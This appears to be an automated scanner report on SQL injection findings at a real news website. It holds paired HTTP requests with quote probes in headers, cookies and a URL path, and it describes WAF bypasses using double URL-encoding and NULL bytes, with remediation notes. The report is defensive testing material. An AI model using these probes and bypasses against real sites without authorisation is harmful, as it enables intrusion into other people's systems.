GET /scott-herhold/ci_16765193?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%2527; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Firths famous plunge for BBC has made him an icon -- even in my house.'><meta name="ke ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /scott-herhold/ci_16765193?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%2527%2527; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Firths famous plunge for BBC has made him an icon -- even in my house.'><meta name="ke ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sharks/ci_16778369?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Ferriero scores, but Braun turnover starts scoring rush'><meta name="keywords" content="Sha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16778369?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16778369?s ...[SNIP]...
The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /sharks/ci_16778369?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669%00';
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Ferriero scores, but Braun turnover starts scoring rush'><meta name="keywords" content="Sha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16778369?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669%00'';
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16778369?s ...[SNIP]...
The fcspersistslider1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fcspersistslider1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sharks/ci_16778369?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1'; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Ferriero scores, but Braun turnover starts scoring rush'><meta name="keywords" content="Sha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16778369?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1''; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16778369?s ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /sharks/ci_16779655?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%00'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Setoguchi returns to San Jose for look at injuryMONTREAL -- Injured forward Devin Setoguch ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16779655?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%00''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16779655?s ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sharks/ci_16779655?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Setoguchi returns to San Jose for look at injuryMONTREAL -- Injured forward Devin Setoguch ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16779655?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16779655?s ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /sharks/ci_16779655?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%00'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Setoguchi returns to San Jose for look at injuryMONTREAL -- Injured forward Devin Setoguch ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16779655?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%00''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16779655?s ...[SNIP]...
The __g_c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /sharks/ci_16779655?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%00'; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Setoguchi returns to San Jose for look at injuryMONTREAL -- Injured forward Devin Setoguch ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16779655?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%00''; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16779655?s ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sharks'/ci_16785264?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='SHARKS AT DETROITFaceoff: 4:30 p.m. at Joe Louis ArenaTV/radio: Versus, 98.5Red Wings updat ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /sharks''/ci_16785264?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks''/ci_16785264 ...[SNIP]...
